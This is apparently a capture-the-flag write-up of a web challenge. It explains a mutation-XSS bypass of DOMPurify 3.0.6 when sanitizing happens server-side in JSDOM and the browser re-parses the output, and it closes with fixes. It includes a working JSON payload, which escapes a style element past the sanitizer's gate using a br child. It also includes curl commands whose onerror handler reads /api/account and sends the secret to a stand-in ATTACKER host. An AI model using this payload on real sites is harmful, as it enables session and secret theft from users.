Note
A publishing app sanitizes a hand-built DOM tree with DOMPurify over JSDOM and ships the serialized string to a browser that re-parses it. A <style> rawtext breakout, hidden from DOMPurify by an element child, turns a "safe" tree into live XSS that steals the editor bot's secret.
inkpress — mXSS via server-side DOMPurify + JSDOM reparse
CTF: Midnight Flag Finals 2026 · Category: Web · Stack: Node / Express, DOMPurify 3.0.6, JSDOM 23.0.1, puppeteer-core
Challenge overview
Inkpress is a small publishing platform. You compose a "story" out of structured blocks, preview it,
publish it to a shareable URL /p/:id, and can ask the editorial desk (a headless Chromium bot) to
read it. The bot holds an httpOnly session cookie and the flag is the app SECRET, returned only to
that session by /api/account:
app.get('/api/account', (req, res) => {
  const cookies = parseCookies(req.headers.cookie);
  if (cookies.session && cookies.session === editorSession) {
    return res.json({ role: 'editor', name: 'Editorial desk', secret: SECRET });
  }
  res.status(401).json({ error: 'sign in required' });
});
So the goal is classic: get XSS in the bot's browser, then fetch('/api/account') and exfiltrate
secret.
How content is built and rendered
You don't submit raw HTML. You submit a JSON tree of { tag, attrs, children } blocks, and the
server walks it into a real DOM with buildNode, sanitizes the whole <article> with DOMPurify
running on a JSDOM window, and stores the serialized string (server.js):
function buildNode(document, spec, depth) {
  if (depth > 64) throw new Error('document nesting too deep');
  if (typeof spec.text === 'string') return document.createTextNode(spec.text);
  const tag = String(spec.tag || '').toLowerCase();
  if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
  const el = document.createElement(tag);
  if (spec.attrs && typeof spec.attrs === 'object') {
    for (const key of Object.keys(spec.attrs)) {
      if (!/^[a-zA-Z_:][\w:.-]*$/.test(key)) continue;
      try { el.setAttribute(key, String(spec.attrs[key])); } catch (e) {}
    }
  }
  if (Array.isArray(spec.children))
    for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
  return el;
}
function renderDocument(tree) {
  const window = new JSDOM('').window;
  const document = window.document;
  const DOMPurify = createDOMPurify(window);
  const root = document.createElement('article');
  for (const node of tree) root.appendChild(buildNode(document, node, 0));
  return DOMPurify.sanitize(root); // returns a STRING (the serialized <article>), stored as post.html
}
The published page /p/:id then drops that stored string into the DOM in the browser:
const data = ${data}; // { title, html }
document.getElementById('post').innerHTML = data.html; // <-- re-parsed by Chromium
That last line is the whole bug surface. DOMPurify only promises that the node tree it returns is safe — not that the string you get from serializing it is safe to feed to a different HTML parser.
The core insight: two HTML engines
Sanitization happens server-side in JSDOM; insertion happens client-side in Chromium. Two parsers touch the same bytes:
1. JSDOM parses the tree and DOMPurify sanitizes it.
2. JSDOM serializes the clean tree to a string (the innerHTML getter).
3. Chromium re-parses that string via element.innerHTML.
mXSS (mutation XSS) lives in step 2→3. The HTML serialization spec has rules that are perfectly safe as long as nobody re-parses the output — and we do re-parse it.
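The key rule: text inside style, script, xmp, iframe, noembed, noframes and plaintext (plus noscript
when scripting is enabled) is serialized literally, without escaping. textarea and title look similar
when parsed, but their text is escaped on serialization, so they are not usable here. A </style>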
inside a <style> text node serializes as the raw bytes </style>, not &lt;/style&gt;. To JSDOM
that's inert character data nested in a node. To Chromium re-parsing it, that </style> closes the
element early and everything after becomes live markup.
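The rule can be illustrated without JSDOM. The sketch below is a simplified model, not JSDOM's serializer: it works on the challenge's { text } / { tag, children } spec shape, ignores attributes and void elements, and the names serialize, escapeText and LITERAL_TEXT_PARENTS are made up for this example. The element set follows the HTML Standard's list of parents whose text is emitted literally (noscript is left out because it depends on the scripting flag).

```javascript
// Simplified model of how text nodes are serialized (assumption: spec-shaped
// nodes as used by the challenge, no attributes, no void-element handling).
const LITERAL_TEXT_PARENTS = new Set([
  'style', 'script', 'xmp', 'iframe', 'noembed', 'noframes', 'plaintext',
]);

// Escaping applied to text everywhere else.
function escapeText(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}

function serialize(node, parentTag = null) {
  if (typeof node.text === 'string') {
    // Text under a literal-text parent is appended as-is.
    return LITERAL_TEXT_PARENTS.has(parentTag) ? node.text : escapeText(node.text);
  }
  const inner = (node.children || []).map((c) => serialize(c, node.tag)).join('');
  return `<${node.tag}>${inner}</${node.tag}>`;
}

const payload = { text: '</style><img src=1 onerror=alert(1)>' };

console.log(serialize({ tag: 'p', children: [payload] }));
// <p>&lt;/style&gt;&lt;img src=1 onerror=alert(1)&gt;</p>

console.log(serialize({ tag: 'style', children: [payload] }));
// <style></style><img src=1 onerror=alert(1)></style>
```

The same text node is harmless under <p> and a breakout under <style>; only the parent element changes.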
Defeating DOMPurify's anti-mXSS gate
DOMPurify 3.0.6 has exactly one defense for this. In _sanitizeElements it force-removes an element
whose children are text only but whose text looks like markup:
// purify.cjs.js (3.0.6)
if (currentNode.hasChildNodes()
    && !_isNode(currentNode.firstElementChild)          // no ELEMENT child
    && regExpTest(/<[/\w]/g, currentNode.innerHTML)
    && regExpTest(/<[/\w]/g, currentNode.textContent)) {
  _forceRemove(currentNode);  // a text-only <style>...</style> gets killed
}
A <style> whose only child is our breakout text is removed. But the gate short-circuits the moment
the element has an element child: firstElementChild becomes non-null, so
!_isNode(currentNode.firstElementChild) is false and the entire condition fails.
Because the challenge lets us build the node tree by hand, we just give <style> two children:
- a harmless element child (<br>) → firstElementChild is non-null → gate skipped, <style> survives;
- a text child carrying </style><img ... onerror=...> → DOMPurify (default config, SAFE_FOR_TEMPLATES unset) never treats text inside a rawtext element as markup, so onerror is never seen, never stripped.
This element-child bypass is patched in DOMPurify 3.1+.
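To see the short-circuit in isolation, here is a toy model of the gate's condition. It is not DOMPurify code: gateRemoves is a hypothetical helper that evaluates the same four checks on the challenge's spec shape, and innerHTML is only approximated (text literal, element children as a bare start tag), which is enough for a <style> parent.

```javascript
// Toy model of the 3.0.6 gate on a spec-shaped <style> node.
// Assumption: children are { text } or { tag } objects as in the challenge JSON.
const MARKUP_LIKE = /<[/\w]/; // same pattern as the gate, without the g flag

function gateRemoves(styleSpec) {
  const children = styleSpec.children || [];
  const hasChildNodes = children.length > 0;
  // First child that is an element, or null if all children are text.
  const firstElementChild = children.find((c) => typeof c.tag === 'string') || null;
  const textContent = children
    .map((c) => (typeof c.text === 'string' ? c.text : ''))
    .join('');
  // Approximation of innerHTML for a literal-text parent.
  const innerHTML = children
    .map((c) => (typeof c.text === 'string' ? c.text : `<${c.tag}>`))
    .join('');
  return hasChildNodes
    && firstElementChild === null
    && MARKUP_LIKE.test(innerHTML)
    && MARKUP_LIKE.test(textContent);
}

const breakout = { text: '</style><img src=1 onerror=alert(1)>' };

console.log(gateRemoves({ tag: 'style', children: [breakout] }));                     // true
console.log(gateRemoves({ tag: 'style', children: [breakout, { tag: 'br' }] }));     // false
console.log(gateRemoves({ tag: 'style', children: [{ text: 'p { color: red }' }] })); // false
```

The second call is the bypass: the text is unchanged, but the extra <br> makes the second check false, so the two regex checks never decide the outcome.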
What each engine sees
DOMPurify walks this and calls it clean (text is opaque inside style):
article
└─ style
   ├─ #text "</style><img src=1 onerror=alert(1)>"   ← opaque chars to JSDOM
   └─ br                                             ← makes firstElementChild non-null
JSDOM serializes the text node literally (rawtext rule):
<article><style></style><img src=1 onerror=alert(1)><br></style></article>
Chromium re-parses that string: the first </style> closes the style early, <img> becomes a real,
live element, onerror fires.
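The re-parse step can be approximated in a few lines. This is a rough model of how a tokenizer treats <style> content, not Chromium's parser: the content runs until the first "</style" followed by whitespace, "/" or ">", and whatever follows is parsed as ordinary markup. splitStyle is a hypothetical helper name.

```javascript
// Rough model of rawtext tokenization for the first <style> in a string.
// Returns the text the browser treats as CSS and the remainder it parses as markup.
function splitStyle(html) {
  const open = '<style>';
  const start = html.indexOf(open);
  if (start === -1) return null;
  const bodyStart = start + open.length;

  // The end tag is matched case-insensitively and must be followed by
  // whitespace, "/" or ">".
  const m = /<\/style[\s/>]/i.exec(html.slice(bodyStart));
  if (!m) return { cssText: html.slice(bodyStart), rest: '' };

  const closeStart = bodyStart + m.index;
  const gt = html.indexOf('>', closeStart);
  const closeEnd = gt === -1 ? html.length : gt + 1;
  return { cssText: html.slice(bodyStart, closeStart), rest: html.slice(closeEnd) };
}

const stored = '<article><style></style><img src=1 onerror=alert(1)><br></style></article>';
const { cssText, rest } = splitStyle(stored);

console.log(cssText === ''); // true: the style element ends up empty
console.log(rest);           // <img src=1 onerror=alert(1)><br></style></article>
```

The stray </style> left in the remainder is simply ignored by a real parser; the <img> before it is what matters.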
Exploit
The JSON tree that proves XSS:
[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=alert(1)>" },
      { "tag": "br" }
    ]
  }
]
Weaponized to steal the flag (the onerror value is double-quoted: in an unquoted attribute the first
space or > ends the value, so the > in r=>r.text() would cut the handler short after reparse):
[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=\"fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))\">" },
      { "tag": "br" }
    ]
  }
]
Publish it, then request a review so the editor bot opens /p/:id (the bot dwells ~5s, plenty of time):
# 1) publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
  -d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=\"fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))\">"},{"tag":"br"}]}]}' \
  | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
# 2) make the editor bot read it
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"
The bot loads the page, the re-parsed <img> fires onerror, fetch('/api/account') returns
{ ..., secret: FLAG }, and it's sent to your listener.
Why the "obvious" path was a dead end
The first instinct (and a lot of wasted time during the CTF) was the deep-nesting DOMPurify CVE
(CVE-2024-47875) — wrapping <img> in ~500 <div> so the depth counter is bypassed. That doesn't apply
here: the app caps depth at 64 and rejects malformed tags, and more importantly the real bug isn't a CVE
at all — it's a serialization/reparse mXSS that exists by design when you sanitize server-side and
re-parse client-side. The fix would be to either run DOMPurify in the browser and insert via
RETURN_DOM_FRAGMENT + replaceChildren (so the string is never re-parsed), or upgrade DOMPurify and
not trust serialized output across parser boundaries.
Takeaways (generalized technique)
- DOMPurify.sanitize(x) returning a string that is later fed to another HTML parser is an mXSS smell. The guarantee is about nodes, not strings.
- Server-side sanitization (JSDOM) + client-side innerHTML = two engines = a gap.
- Rawtext-style elements (style, script, xmp, iframe, noembed, noframes, and noscript with scripting enabled) serialize inner text unescaped, which makes them prime breakout vectors. textarea and title do not qualify: their text is escaped on serialization.
- On DOMPurify ≤ 3.0.x, give a rawtext element an element child (<br>) to skip the firstElementChild anti-mXSS gate.
- Safe usage: DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true }) then replaceChildren(frag). No re-parse, no gap.
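The safe-usage pattern can be sketched as a small browser-side helper. renderSanitized is a hypothetical name, and the helper takes the DOMPurify instance and the target element as parameters so nothing about the page is assumed; RETURN_DOM_FRAGMENT and replaceChildren are the only library and DOM features it relies on.

```javascript
// Sketch of a no-reparse insertion path (hypothetical helper, not part of DOMPurify).
// purify: a DOMPurify instance; target: the element to fill; dirtyHtml: untrusted markup.
function renderSanitized(purify, target, dirtyHtml) {
  // With RETURN_DOM_FRAGMENT, sanitize() hands back a DocumentFragment instead of a string.
  const fragment = purify.sanitize(dirtyHtml, { RETURN_DOM_FRAGMENT: true });
  // replaceChildren() moves the sanitized nodes into place; no serialization,
  // no second parse.
  target.replaceChildren(fragment);
  return target;
}

// In the published page this would replace the innerHTML assignment, e.g.:
// renderSanitized(DOMPurify, document.getElementById('post'), data.html);
```

Because parsing and sanitizing both happen in the browser that renders the result, the nodes DOMPurify approved are the nodes that end up in the page.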
Sources & references
- Challenge source: midnight_flag_finals_2026/web/inkpress
- DOMPurify misconfigurations & bypasses (mizu.re): https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes
- CVE-2024-47875 (DOMPurify nesting/mXSS class): https://www.sentinelone.com/vulnerability-database/cve-2024-47875/